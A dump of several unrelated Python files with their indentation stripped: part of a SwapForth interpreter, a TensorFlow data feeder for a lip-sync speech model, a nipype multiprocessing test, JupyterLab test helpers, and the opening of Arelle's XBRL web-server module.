inc = self.d.pop()
self.loopC = self.w32(self.loopC + inc)
after = self.w32(self.loopC - self.loopL) < 0
if inc > 0:
finish = before > after
else:
finish = before < after
self.lit(finish)
@setimmediate
def DO(self):
self.leaves.append([])
self.code.append(self.dodo)
self.lit(len(self.code))
@setimmediate
def LOOP(self):
self.lit(1)
self.LITERAL()
self.plus_loop()
@setimmediate
def plus_loop(self):
""" +LOOP """
self.code.append(self.doloop)
self.UNTIL()
leaves = self.leaves.pop()
for p in leaves:
self.code[p] = partial(self.code[p], len(self.code))
self.code.append(self.UNLOOP)
@setimmediate
def question_do(self):
""" ?DO """
self.code.append(self.qdodo)
self.leaves.append([len(self.code)])
self.code.append(self.zbranch)
self.lit(len(self.code))
return
self.code.append(self.two_dup)
self.code.append(self.equal)
self.leaves.append([len(self.code)])
self.code.append(self.zbranch)
self.code.append(self.dodo)
self.lit(len(self.code))
def I(self):
self.lit(self.loopC)
def J(self):
self.lit(self.r[-2])
def UNLOOP(self):
self.loopL = self.r.pop()
self.loopC = self.r.pop()
def QUIT(self):
print('QUIT')
raise swapforth.Bye
@setimmediate
def LEAVE(self):
self.leaves[-1].append(len(self.code))
self.code.append(self.branch)
def EVALUATE(self):
self.q('SOURCE >R >R >IN @ >R')
self.q('SOURCEID @ >R -1 SOURCEID !')
self.q('SOURCEC ! SOURCEA ! 0 >IN !')
self.interpret()
self.q('R> SOURCEID !')
self.q('R> >IN ! R> SOURCEA ! R> SOURCEC !')
def source_id(self):
""" SOURCE-ID """
self.q('SOURCEID @')
def interpret(self):
def consume1(c):
if self.d[-1] != 0:
r = self.ram[self.d[-2]] == c
else:
r = 0
if r:
self.lit(1)
self.slash_string()
return r
def da():
self.two_dup()
was = self.pops()
if len(was) == 3 and was[0] == "'" and was[2] == "'":
self.two_drop()
self.lit(ord(was[1]))
self.lit(1)
return
self.dlit(0)
self.two_swap()
if consume1(ord('$')):
base = 16
elif consume1(ord('#')):
base = 10
elif consume1(ord('%')):
base = 2
else:
base = None
neg = consume1(ord('-'))
self.to_number(base)
double = consume1(ord('.'))
if self.d.pop() != 0:
self.lit(-13)
self.THROW()
self.DROP()
if double:
if neg:
self.q('DNEGATE')
self.lit(2)
else:
self.DROP()
if neg:
self.NEGATE()
self.lit(1)
def doubleAlso():
da()
self.DROP()
def doubleAlso_comma():
da()
if self.d.pop() == 2:
self.SWAP()
self.LITERAL()
self.LITERAL()
while True:
self.parse_name()
if self.d[-1] == 0:
break
self.SFIND()
i = self.d.pop() + 1
self.state()
self.fetch()
i += 3 * self.d.pop()
[ # nonimmediate number immediate
# ------------ ------ ---------
self.EXECUTE, doubleAlso, self.EXECUTE, # interpretation
self.compile_comma, doubleAlso_comma, self.EXECUTE # compilation
][i]()
self.two_drop()
def REFILL(self):
self.q('SOURCEID @')
if self.d.pop() == 0:
self.tib()
self.lit(256)
self.ACCEPT()
self.q('SOURCEC !')
self.q('TIB SOURCEA !')
self.q('0 >IN !')
self.lit(-1)
else:
self.lit(0)
def putcmd(self, cmd):
if cmd.endswith('\r'):
cmd = cmd[:-1]
self.tib()
tib = self.d.pop()
for i,c in enumerate(cmd):
self.ram[tib + i] = ord(c)
self.q('TIB SOURCEA !')
self.lit(len(cmd))
self.q('SOURCEC !')
self.q('0 >IN !')
import threading
try:
import queue
except ImportError:
import Queue as queue
class AsyncSwapForth(SwapForth):
def __init__(self, cmdq, ready, *options):
SwapForth.__init__(self, *options)
self.cmdq = cmdq
self.ready = ready
while True:
self.REFILL()
if not self.d.pop():
assert 0, "REFILL failed"
self.lit(self.xt(self.interpret))
self.CATCH()
e = self.d.pop()
if e:
codes = {
-1 : ": aborted",
-4 : ": stack underflow",
-9 : ": invalid memory address",
-13 : ": undefined word",
-14 : ": interpreting a compile-only word",
-28 : ": user interrupt"}
self.out('error: %d%s\n' % (e, codes.get(e, "")))
else:
self.out(' ok\r\n')
def ACCEPT(self):
(a, n) = self.popn(2)
self.ready.set()
(self.out, s) = self.cmdq.get()[:n]
ns = len(s)
self.ram[a:a + ns] = ba(s)
self.lit(ns)
class Tethered(swapforth.TetheredTarget):
def __init__(self, *options):
self.searchpath = ['.']
self.log = open("log", "w")
self.ser = None
self.verbose = False
self.interpreting = False
self.ready = threading.Event()
self.cmdq = queue.Queue()
self.t = threading.Thread(target = AsyncSwapForth, args = (self.cmdq, self.ready) + options)
self.t.setDaemon(True)
self.t.start()
self.ready.wait()
def issue(self, writer, cmd):
assert self.ready.is_set()
self.ready.clear()
self.cmdq.put((writer, cmd))
self.ready.wait()
def interactive_command(self, cmd):
self.issue(sys.stdout.write, cmd)
def command_response(self, cmd):
r = []
self.issue(lambda c: r.append(c), cmd)
return "".join(r)
if __name__ == '__main__':
cellsize = 4
endian = '<'
try:
options,args = getopt.getopt(sys.argv[1:], 'c:b')
optdict = dict(options)
if '-c' in optdict:
cellsize = int(optdict['-c'])
if '-b' in optdict:
endian = '>'
except getopt.GetoptError:
print("usage:")
print(" -c N cell size, one of 2,4 or 8")
print(" -b big-endian. Default is little-endian")
sys.exit(1)
dpans = {}
allw = set()
t = Tethered(cellsize, endian)
t.searchpath += ['../anstests', '../common']
# print set(t.sf.dict.keys()) - dpans['CORE']
try:
t.include('swapforth.fs')
[t.include(a) for a in args]
except swapforth.Bye:
pass
if 0:
words = set(t.command_response('words').split())
missing = dpans['CORE'] - words
print(len(missing), "MISSING CORE", " ".join(sorted(missing)))
print(words - allw)
t.shell()
|
feeder-checkpoint.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from npu_bridge.npu_init import *
from sklearn.model_selection import train_test_split
from synthesizer.utils.text import text_to_sequence
from synthesizer.infolog import log
import tensorflow as tf
import numpy as np
import threading
import time
import os
from os.path import dirname, join, basename, isfile
import cv2
_batches_per_group = 4 # Maybe change to 5 samples per batch
class Feeder:
"""
Feeds batches of data into queue on a background thread.
"""
def __init__(self, coordinator, hparams):
super(Feeder, self).__init__()
self._coord = coordinator
self._hparams = hparams
self._train_offset = 0
self._test_offset = 0
self.filelist = { 'train' : self._hparams.all_images, 'test' : self._hparams.all_test_images}
self.test_steps = 2
#pad input sequences with the <pad_token> 0 ( _ )
self._pad = 0
#explicitely setting the padding to a value that doesn"t originally exist in the spectogram
#to avoid any possible conflicts, without affecting the output range of the model too much
if hparams.symmetric_mels:
self._target_pad = -hparams.max_abs_value
else:
self._target_pad = 0.
#Mark finished sequences with 1s
self._token_pad = 1.
#TODO
#with tf.device('/cpu:0'):
# Create placeholders for inputs and targets. Don"t specify batch size because we want
# to be able to feed different batch sizes at eval time.
batch_size = hparams.tacotron_batch_size
# batch_size =None
self._placeholders = [
tf.placeholder(tf.float32, shape=(batch_size, hparams.T, hparams.img_size,
hparams.img_size, 3), name="inputs"),
tf.placeholder(tf.int32, shape=(batch_size,), name="input_lengths"),
tf.placeholder(tf.float32, shape=(batch_size, hparams.mel_step_size, hparams.num_mels),
name="mel_targets"),
#tf.placeholder(tf.float32, shape=(None, None), name="token_targets"),
tf.placeholder(tf.int32, shape=(batch_size, ), name="targets_lengths"),
tf.placeholder(tf.int32, shape=(batch_size, None),
name="split_infos"),
# SV2TTS
tf.placeholder(tf.float32, shape=(batch_size, 256),
name="speaker_embeddings")
]
self.inputs_test, self.input_lengths_test, self.mel_targets_test, self.targets_lengths_test, self.split_infos_test, self.speaker_embeddings_test = self._placeholders
# Create queue for buffering data
#queue = tf.FIFOQueue(8, [tf.float32, tf.int32, tf.float32, tf.float32,
# tf.int32, tf.int32, tf.float32], name="input_queue")
queue = tf.FIFOQueue(8, [tf.float32, tf.int32, tf.float32,
tf.int32, tf.int32, tf.float32], name="input_queue")
self._enqueue_op = queue.enqueue(self._placeholders)
#self.inputs, self.input_lengths, self.mel_targets, self.token_targets, \
# self.targets_lengths, self.split_infos, self.speaker_embeddings = queue.dequeue()
print ("queue contents before : ", queue) #size())
self.inputs, self.input_lengths, self.mel_targets, \
self.targets_lengths, self.split_infos, self.speaker_embeddings = queue.dequeue()
print ("queue size after : ", queue.size())
self.dequeue_op = queue.dequeue()
self.inputs.set_shape(self._placeholders[0].shape)
self.input_lengths.set_shape(self._placeholders[1].shape)
self.mel_targets.set_shape(self._placeholders[2].shape)
#self.token_targets.set_shape(self._placeholders[3].shape)
self.targets_lengths.set_shape(self._placeholders[3].shape)
self.split_infos.set_shape(self._placeholders[4].shape)
self.speaker_embeddings.set_shape(self._placeholders[5].shape)
# Create eval queue for buffering eval data
#eval_queue = tf.FIFOQueue(1, [tf.float32, tf.int32, tf.float32, tf.float32,
# tf.int32, tf.int32, tf.float32], name="eval_queue")
eval_queue = tf.FIFOQueue(1, [tf.float32, tf.int32, tf.float32,
tf.int32, tf.int32, tf.float32], name="eval_queue")
self._eval_enqueue_op = eval_queue.enqueue(self._placeholders)
#self.eval_inputs, self.eval_input_lengths, self.eval_mel_targets, \
# self.eval_token_targets, self.eval_targets_lengths, \
# self.eval_split_infos, self.eval_speaker_embeddings = eval_queue.dequeue()
self.eval_inputs, self.eval_input_lengths, self.eval_mel_targets, \
self.eval_targets_lengths, \
self.eval_split_infos, self.eval_speaker_embeddings = eval_queue.dequeue()
self.eval_inputs.set_shape(self._placeholders[0].shape)
self.eval_input_lengths.set_shape(self._placeholders[1].shape)
self.eval_mel_targets.set_shape(self._placeholders[2].shape)
#self.eval_token_targets.set_shape(self._placeholders[3].shape)
self.eval_targets_lengths.set_shape(self._placeholders[3].shape)
self.eval_split_infos.set_shape(self._placeholders[4].shape)
self.eval_speaker_embeddings.set_shape(self._placeholders[5].shape)
def start_threads(self, session):
self._session = session
thread = threading.Thread(name="background", target=self._enqueue_next_train_group)
thread.daemon = True #Thread will close when parent quits
thread.start()
def _get_test_groups(self):
# print('Getting test group')
input_data, mel_target = self.getitem(split='test')
embed_target = np.zeros([256], dtype=np.float32)
return input_data, mel_target, embed_target, len(mel_target)
def make_test_batches(self):
start = time.time()
# Read a group of examples
n = self._hparams.tacotron_batch_size
r = self._hparams.outputs_per_step
#Test on entire test set
examples = [self._get_test_groups() for i in range(1)]
# Bucket examples based on similar output sequence length for efficiency
batches = [examples[i: i+n] for i in range(0, len(examples), n)]
np.random.shuffle(batches)
log("\nGenerated %d test batches of size %d in %.3f sec" % (len(batches), n, time.time() - start))
return batches, r
def enqueue_test(self):
start = time.time()
n = self._hparams.tacotron_batch_size
r = self._hparams.outputs_per_step
examples = [self._get_next_example() for i in range(n * _batches_per_group)]
# Bucket examples based on similar output sequence length for efficiency
examples.sort(key=lambda x: x[-1])
batches = [examples[i: i+n] for i in range(0, len(examples), n)]
np.random.shuffle(batches)
log("\nGenerated {} train batches of size {} in {:.3f} sec".format(len(batches), n, time.time() - start))
for batch in batches:
feed_dict = dict(zip(self._placeholders, self._prepare_batch(batch, r)))
def get_feed_dict(self):
start = time.time()
n = self._hparams.tacotron_batch_size
r = self._hparams.outputs_per_step
examples = [self._get_next_example() for i in range(n * _batches_per_group)]
# Bucket examples based on similar output sequence length for efficiency
examples.sort(key=lambda x: x[-1])
batches = [examples[i: i+n] for i in range(0, len(examples), n)]
np.random.shuffle(batches)
log("\nGenerated {} train batches of size {} in {:.3f} sec".format(len(batches), n, time.time() - start))
for batch in batches:
feed_dict = dict(zip(self._placeholders, self._prepare_batch(batch, r)))
return feed_dict
def _enqueue_next_train_group(self):
while not self._coord.should_stop():
start = time.time()
# Read a group of examples
n = self._hparams.tacotron_batch_size
r = self._hparams.outputs_per_step
examples = [self._get_next_example() for i in range(n * _batches_per_group)]
# Bucket examples based on similar output sequence length for efficiency
examples.sort(key=lambda x: x[-1])
batches = [examples[i: i+n] for i in range(0, len(examples), n)]
np.random.shuffle(batches)
log("\nGenerated {} train batches of size {} in {:.3f} sec".format(len(batches), n, time.time() - start))
for batch in batches:
feed_dict = dict(zip(self._placeholders, self._prepare_batch(batch, r)))
self._session.run(self._enqueue_op, feed_dict=feed_dict)
def _enqueue_next_test_group(self):
#Create test batches once and evaluate on them for all test steps
test_batches, r = self.make_test_batches()
while not self._coord.should_stop():
for batch in test_batches:
feed_dict = dict(zip(self._placeholders, self._prepare_batch(batch, r)))
self._session.run(self._eval_enqueue_op, feed_dict=feed_dict)
def getitem(self, split='train'):
while 1:
idx = np.random.randint(len(self.filelist[split]))
img_name = self.filelist[split][idx]
window_fnames = self.get_window(img_name)
if window_fnames is None:
idx = np.random.randint(len(self.filelist[split]))
continue
if len(window_fnames) != self._hparams.T :
idx = np.random.randint(len(self.filelist[split]))
continue
mel = np.load(os.path.join(os.path.dirname(img_name), 'mels.npz'))['spec'].T
mel = self.crop_audio_window(mel, img_name)
if (mel.shape[0] != self._hparams.mel_step_size):
idx = np.random.randint(len(self.filelist[split]))
continue
break
window = []
for fname in window_fnames:
img = cv2.imread(fname)
try:
img = cv2.resize(img, (self._hparams.img_size, self._hparams.img_size))
except:
continue
window.append(img)
x = np.asarray(window) / 255.
return x, mel
def _get_next_example(self):
"""Gets a single example (input, mel_target, token_target, linear_target, mel_length) from_ disk
"""
input_data, mel_target = self.getitem()
embed_target = np.zeros([256], dtype=np.float32)
#return input_data, mel_target, token_target, embed_target, len(mel_target)
return input_data, mel_target, embed_target, len(mel_target)
def _prepare_batch(self, batches, outputs_per_step):
assert 0 == len(batches) % self._hparams.tacotron_num_gpus
size_per_device = int(len(batches) / self._hparams.tacotron_num_gpus)
np.random.shuffle(batches)
inputs = None
mel_targets = None
#token_targets = None
targets_lengths = None
split_infos = []
targets_lengths = np.asarray([x[-1] for x in batches], dtype=np.int32) #Used to mask loss
input_lengths = np.asarray([len(x[0]) for x in batches], dtype=np.int32)
for i in range(self._hparams.tacotron_num_gpus):
batch = batches[size_per_device*i:size_per_device*(i+1)]
input_cur_device, input_max_len = self._prepare_inputs([x[0] for x in batch])
inputs = np.concatenate((inputs, input_cur_device), axis=1) if inputs is not None else input_cur_device
mel_target_cur_device, mel_target_max_len = self._prepare_targets([x[1] for x in batch], outputs_per_step)
mel_targets = np.concatenate(( mel_targets, mel_target_cur_device), axis=1) if mel_targets is not None else mel_target_cur_device
#Pad sequences with 1 to infer that the sequence is done
#token_target_cur_device, token_target_max_len = self._prepare_token_targets([x[2] for x in batch], outputs_per_step)
#token_targets = np.concatenate((token_targets, token_target_cur_device),axis=1) if token_targets is not None else token_target_cur_device
split_infos.append([input_max_len, mel_target_max_len])
split_infos = np.asarray(split_infos, dtype=np.int32)
### SV2TTS ###
#embed_targets = np.asarray([x[3] for x in batches])
embed_targets = np.asarray([x[2] for x in batches])
##############
#return inputs, input_lengths, mel_targets, token_targets, targets_lengths, \
# split_infos, embed_targets
return inputs, input_lengths, mel_targets, targets_lengths, \
split_infos, embed_targets
def _prepare_inputs(self, inputs):
max_len = max([len(x) for x in inputs])
return np.stack([self._pad_input(x, max_len) for x in inputs]), max_len
def _prepare_targets(self, targets, alignment):
max_len = max([len(t) for t in targets])
data_len = self._round_up(max_len, alignment)
return np.stack([self._pad_target(t, data_len) for t in targets]), data_len
'''
def _prepare_token_targets(self, targets, alignment):
max_len = max([len(t) for t in targets]) + 1
data_len = self._round_up(max_len, alignment)
return np.stack([self._pad_token_target(t, data_len) for t in targets]), data_len
'''
def _pad_input(self, x, length):
return np.pad(x, (0, length - x.shape[0]), mode="constant", constant_values=self._pad)
def _pad_target(self, t, length):
return np.pad(t, [(0, length - t.shape[0]), (0, 0)], mode="constant", constant_values=self._target_pad)
def _pad_token_target(self, t, length):
return np.pad(t, (0, length - t.shape[0]), mode="constant", constant_values=self._token_pad)
def _round_up(self, x, multiple):
remainder = x % multiple
return x if remainder == 0 else x + multiple - remainder
def _round_down(self, x, multiple):
remainder = x % multiple
return x if remainder == 0 else x - remainder
####### MY FUNCTIONS##################
def get_frame_id(self, frame):
return int(basename(frame).split('.')[0])
def get_window(self, center_frame):
center_id = self.get_frame_id(center_frame)
vidname = dirname(center_frame)
if self._hparams.T%2:
window_ids = range(center_id - self._hparams.T//2, center_id + self._hparams.T//2 + 1)
else:
window_ids = range(center_id - self._hparams.T//2, center_id + self._hparams.T//2)
window_fnames = []
for frame_id in window_ids:
frame = join(vidname, '{}.jpg'.format(frame_id))
if not isfile(frame):
return None
window_fnames.append(frame)
return window_fnames
def crop_audio_window(self, spec, center_frame):
# estimate total number of frames from spec (num_features, T)
# num_frames = (T x hop_size * fps) / sample_rate
start_frame_id = self.get_frame_id(center_frame) - self._hparams.T//2
total_num_frames = int((spec.shape[0] * self._hparams.hop_size * self._hparams.fps) / self._hparams.sample_rate)
start_idx = int(spec.shape[0] * start_frame_id / float(total_num_frames))
end_idx = start_idx + self._hparams.mel_step_size
return spec[start_idx : end_idx, :]
|
test_legacymultiproc_nondaemon.py
|
# -*- coding: utf-8 -*-
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
"""Testing module for functions and classes from multiproc.py
"""
# Import packages
import os
import sys
from tempfile import mkdtemp
from shutil import rmtree
import pytest
import nipype.pipeline.engine as pe
from nipype.interfaces.utility import Function
def mytestFunction(insum=0):
'''
Run a multiprocessing job and spawn child processes.
'''
# need to import here since this is executed as an external process
import multiprocessing
import os
import tempfile
import time
numberOfThreads = 2
# list of processes
t = [None] * numberOfThreads
# list of alive flags
a = [None] * numberOfThreads
# list of tempFiles
f = [None] * numberOfThreads
def dummyFunction(filename):
'''
This function writes the value 45 to the given filename.
'''
j = 0
for i in range(0, 10):
j += i
# j is now 45 (0+1+2+3+4+5+6+7+8+9)
with open(filename, 'w') as f:
f.write(str(j))
for n in range(numberOfThreads):
# mark thread as alive
a[n] = True
# create a temp file to use as the data exchange container
tmpFile = tempfile.mkstemp('.txt', 'test_engine_')[1]
f[n] = tmpFile # keep track of the temp file
t[n] = multiprocessing.Process(target=dummyFunction, args=(tmpFile, ))
# fire up the job
t[n].start()
# block until all processes are done
allDone = False
while not allDone:
time.sleep(1)
for n in range(numberOfThreads):
a[n] = t[n].is_alive()
if not any(a):
# if no thread is alive
allDone = True
# here, all processes are done
# read in all temp files and sum them up
total = insum
for ff in f:
with open(ff) as fd:
total += int(fd.read())
os.remove(ff)
return total
def run_multiproc_nondaemon_with_flag(nondaemon_flag):
'''
Start a pipe with two nodes using the resource multiproc plugin and
passing the nondaemon_flag.
'''
cur_dir = os.getcwd()
temp_dir = mkdtemp(prefix='test_engine_')
os.chdir(temp_dir)
pipe = pe.Workflow(name='pipe')
f1 = pe.Node(
interface=Function(
function=mytestFunction,
input_names=['insum'],
output_names=['sum_out']),
name='f1')
f2 = pe.Node(
interface=Function(
function=mytestFunction,
input_names=['insum'],
output_names=['sum_out']),
name='f2')
pipe.connect([(f1, f2, [('sum_out', 'insum')])])
pipe.base_dir = os.getcwd()
f1.inputs.insum = 0
pipe.config['execution']['stop_on_first_crash'] = True
# execute the pipe using the LegacyMultiProc plugin with 2 processes and the
# non_daemon flag to enable child processes which start other
# multiprocessing jobs
execgraph = pipe.run(
plugin="LegacyMultiProc",
plugin_args={
'n_procs': 2,
'non_daemon': nondaemon_flag
})
names = [
'.'.join((node._hierarchy, node.name)) for node in execgraph.nodes()
]
node = list(execgraph.nodes())[names.index('pipe.f2')]
result = node.get_output('sum_out')
os.chdir(cur_dir)
rmtree(temp_dir)
return result
def test_run_multiproc_nondaemon_false():
'''
This is the entry point for the test. Two times a pipe of several
multiprocessing jobs gets executed. First, without the nondaemon flag.
Second, with the nondaemon flag.
Since the processes of the pipe start child processes, the execution only
succeeds when the non_daemon flag is on.
'''
shouldHaveFailed = False
try:
# with nondaemon_flag = False, the execution should fail
run_multiproc_nondaemon_with_flag(False)
except:
shouldHaveFailed = True
assert shouldHaveFailed
def test_run_multiproc_nondaemon_true():
# with nondaemon_flag = True, the execution should succeed
result = run_multiproc_nondaemon_with_flag(True)
assert result == 180 # n_procs (2) * numberOfThreads (2) * 45 == 180
|
utils.py
|
import errno
import os
import sys
from os.path import join as pjoin
from binascii import hexlify
from threading import Thread, Event
try:
from unittest.mock import patch
except ImportError:
from mock import patch # py2
from ipython_genutils.tempdir import TemporaryDirectory
from jupyterlab.labapp import LabApp
from notebook.tests.launchnotebook import NotebookTestBase
from notebook.utils import url_path_join
import jupyter_core
from traitlets.config import Config
from tornado.ioloop import IOLoop
class LabTestBase(NotebookTestBase):
@classmethod
def setup_class(cls):
cls.tmp_dir = TemporaryDirectory()
def tmp(*parts):
path = os.path.join(cls.tmp_dir.name, *parts)
try:
os.makedirs(path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
return path
cls.home_dir = tmp('home')
data_dir = cls.data_dir = tmp('data')
config_dir = cls.config_dir = tmp('config')
runtime_dir = cls.runtime_dir = tmp('runtime')
cls.notebook_dir = tmp('notebooks')
cls.env_patch = patch.dict('os.environ', {
'HOME': cls.home_dir,
'PYTHONPATH': os.pathsep.join(sys.path),
'IPYTHONDIR': pjoin(cls.home_dir, '.ipython'),
'JUPYTER_NO_CONFIG': '1', # needed in the future
'JUPYTER_CONFIG_DIR': config_dir,
'JUPYTER_DATA_DIR': data_dir,
'JUPYTER_RUNTIME_DIR': runtime_dir,
})
cls.env_patch.start()
cls.path_patch = patch.multiple(
jupyter_core.paths,
SYSTEM_JUPYTER_PATH=[tmp('share', 'jupyter')],
ENV_JUPYTER_PATH=[tmp('env', 'share', 'jupyter')],
SYSTEM_CONFIG_PATH=[tmp('etc', 'jupyter')],
ENV_CONFIG_PATH=[tmp('env', 'etc', 'jupyter')],
)
cls.path_patch.start()
config = cls.config or Config()
config.NotebookNotary.db_file = ':memory:'
cls.token = hexlify(os.urandom(4)).decode('ascii')
started = Event()
def start_thread():
app = cls.notebook = LabApp(
port=cls.port,
port_retries=0,
open_browser=False,
config_dir=cls.config_dir,
data_dir=cls.data_dir,
runtime_dir=cls.runtime_dir,
notebook_dir=cls.notebook_dir,
base_url=cls.url_prefix,
config=config,
allow_root=True,
token=cls.token,
)
# don't register signal handler during tests
app.init_signal = lambda: None
# clear log handlers and propagate to root for nose to capture it
# needs to be redone after initialize, which reconfigures logging
app.log.propagate = True
app.log.handlers = []
app.initialize(argv=[])
app.log.propagate = True
app.log.handlers = []
loop = IOLoop.current()
loop.add_callback(started.set)
try:
app.start()
finally:
# set the event, so failure to start doesn't cause a hang
started.set()
app.session_manager.close()
cls.notebook_thread = Thread(target=start_thread)
cls.notebook_thread.daemon = True
cls.notebook_thread.start()
started.wait()
cls.wait_until_alive()
class APITester(object):
"""Wrapper for REST API requests"""
url = '/'
def __init__(self, request):
self.request = request
def _req(self, verb, path, body=None):
response = self.request(verb,
url_path_join(self.url, path), data=body)
if 400 <= response.status_code < 600:
try:
response.reason = response.json()['message']
except Exception:
pass
response.raise_for_status()
return response
|
CntlrWebMain.py
|
'''
Created on Oct 3, 2010
Use this module to start Arelle in web server mode
@author: Mark V Systems Limited
(c) Copyright 2010 Mark V Systems Limited, All rights reserved.
'''
from arelle.webserver.bottle import Bottle, request, response, static_file
from arelle.Cntlr import LogFormatter
import os, io, sys, time, threading, uuid
from arelle import Version
from arelle.FileSource import FileNamedStringIO
_os_pid = os.getpid()
def startWebserver(_cntlr, options):
"""Called once from main program in CmtlrCmdLine to initiate web server on specified local port.
To test WebServer run from source in IIS, use an entry like this: c:\python33\python.exe c:\\users\\myname\\mySourceFolder\\arelleCmdLine.py %s
:param options: OptionParser options from parse_args of main argv arguments (the argument *webserver* provides hostname and port), port being used to startup the webserver on localhost.
:type options: optparse.Values
"""
global imagesDir, cntlr, optionsPrototype
cntlr = _cntlr
imagesDir = cntlr.imagesDir
optionValuesTypes = _STR_NUM_TYPES + (type(None),)
optionsPrototype = dict((option,value if isinstance(value,_STR_NUM_TYPES) else None)
for option in dir(options)
for value in (getattr(options, option),)
if isinstance(value,optionValuesTypes) and not option.startswith('_'))
host, sep, portServer = options.webserver.partition(":")
port, sep, server = portServer.partition(":")
# start a Bottle application
app = Bottle()
GETorPOST = ('GET', 'POST')
GET = 'GET'
POST = 'POST'
# install REST API interfaces
# if necessary to support CGI hosted servers below root, add <prefix:path> as first part of routes
# and corresponding arguments to the handler methods
app.route('/rest/login', GET, login_form)
app.route('/rest/login', POST, login_submit)
app.route('/rest/logout', GET, logout)
app.route('/favicon.ico', GET, arelleIcon)
app.route('/rest/xbrl/<file:path>/open', GETorPOST, validation)
app.route('/rest/xbrl/<file:path>/close', GETorPOST, validation)
app.route('/rest/xbrl/<file:path>/validation/xbrl', GETorPOST, validation)
app.route('/rest/xbrl/<file:path>/DTS', GETorPOST, validation)
app.route('/rest/xbrl/<file:path>/concepts', GETorPOST, validation)
app.route('/rest/xbrl/<file:path>/pre', GETorPOST, validation)
app.route('/rest/xbrl/<file:path>/cal', GETorPOST, validation)
app.route('/rest/xbrl/<file:path>/dim', GETorPOST, validation)
app.route('/rest/xbrl/<file:path>/facts', GETorPOST, validation)
app.route('/rest/xbrl/<file:path>/factTable', GETorPOST, validation)
app.route('/rest/xbrl/<file:path>/roleTypes', GETorPOST, validation)
app.route('/rest/xbrl/<file:path>/arcroleTypes', GETorPOST, validation)
app.route('/rest/xbrl/<file:path>/formulae', GETorPOST, validation)
app.route('/rest/xbrl/validation', GETorPOST, validation)
app.route('/rest/xbrl/view', GETorPOST, validation)
app.route('/rest/xbrl/open', GETorPOST, validation)
app.route('/rest/xbrl/close', GETorPOST, validation)
app.route('/images/<imgFile>', GET, image)
app.route('/rest/xbrl/diff', GET, diff)
app.route('/rest/configure', GET, configure)
app.route('/rest/stopWebServer', GET, stopWebServer)
app.route('/quickbooks/server.asmx', POST, quickbooksServer)
app.route('/rest/quickbooks/<qbReport>/xbrl-gl/<file:path>', GET, quickbooksGLrequest)
app.route('/rest/quickbooks/<qbReport>/xbrl-gl/<file:path>/view', GET, quickbooksGLrequest)
app.route('/rest/quickbooks/<qbReport>/xbrl-gl/view', GET, quickbooksGLrequest)
app.route('/rest/quickbooks/response', GET, quickbooksGLresponse)
app.route('/quickbooks/server.html', GET, quickbooksWebPage)
app.route('/quickbooks/localhost.crt', GET, localhostCertificate)
app.route('/localhost.crt', GET, localhostCertificate)
app.route('/help', GET, helpREST)
app.route('/about', GET, about)
app.route('/', GET, indexPageREST)
if server == "cgi":
# catch a non-REST interface by cgi Interface (may be a cgi app exe module, etc)
app.route('<cgiAppPath:path>', GETorPOST, cgiInterface)
if server == "wsgi":
return app
elif server == "cgi":
if sys.stdin is None:
sys.stdin = open(os.devnull, 'r')
app.run(server=server)
sys.exit(0)
elif server:
app.run(host=host, port=port or 80, server=server)
else:
app.run(host=host, port=port or 80)
def cgiInterface(cgiAppPath):
# route request according to content
#with open(r"c:\temp\tracecgi.log", "at", encoding="utf-8") as fh:
# fh.write("trace 2 arg={}\n".format(cgiAppPath))
if not request.query: # no parameters, index page
return indexPageCGI()
elif 'about' in request.query:
return about(cgiAppPath + "?image=arelle32.gif")
elif 'help' in request.query:
return helpREST()
elif 'image' in request.query:
return image(request.query.image)
else:
return indexPageCGI()
def login_form():
"""Request for a login form (get to */rest/login*). Corresponds to login from other providers of XBRL validation services, but
this version of Arelle does not perform accounting or charges for validation requests, so the login is ignored.
:returns: str -- HTML login form to enter and submit via method=POST these fields: name, password
"""
return _('''<html><body><form method="POST"><table>
<tr><td>Name:</td><td><input name="name" type="text" /></td></tr>
<tr><td>Password:</td><td><input name="password" type="password" /></td></tr>
<tr><td> </td><td><input type="submit" value="Submit" /></td></tr>
</table></form></body></html>''')
def login_submit():
"""Login of fields from login form (post to */rest/login*). Saves user ID for future use.
:param name: User ID
:param password: Password
"""
name = request.forms.get('name')
password = request.forms.get('password')
if checkLogin(name, password):
return _("<p>You are logged in as user: {0}</p>").format(name)
else:
return _("<p>Login failed</p>")
def checkLogin(_user, _password):
"""Save user ID for future use. Password not currently processed.
:returns: bool -- True (for now, future user may interact with authentication and accounting services.)
"""
global user
user = _user
return True
def logout():
"""Request to log out (get */rest/logout*). Removes any proior user ID from session.
:returns: html -- Message that user has logged out
"""
global user
user = None
return _("<p>You are logged out.</p>")
def arelleIcon():
"""Request for icon for URL display (get */favicon.ico*).
:returns: ico -- Icon file for browsers
"""
return static_file("arelle.ico", root=imagesDir, mimetype='image/vnd.microsoft.icon')
def image(imgFile):
"""Request for an image file for URL display (get */images/<imgFile>*).
:returns: image file -- Requested image file from images directory of application for browsers
"""
return static_file(imgFile, root=imagesDir)
validationOptions = {
# these options have no value (after + in query)
"efm": ("validateEFM", True),
"efm-pragmatic": ("disclosureSystemName", "efm-pragmatic"),
"efm-strict": ("disclosureSystemName", "efm-strict"),
"disclosure-system": ("disclosureSystemName", None),
"ifrs": ("gfmName", "ifrs"),
"hmrc": ("gfmName", "hmrc"),
"sbr-nl": ("gfmName", "sbr-nl"),
"utr": ("utrValidate", True),
"infoset": ("infosetValidate", True),
# these parameters pass through the value after + in query
"import": ("importFiles", None),
}
validationKeyVarName = {
# these key names store their value in the named var that differs from key name
"disclosureSystem": "disclosureSystemName",
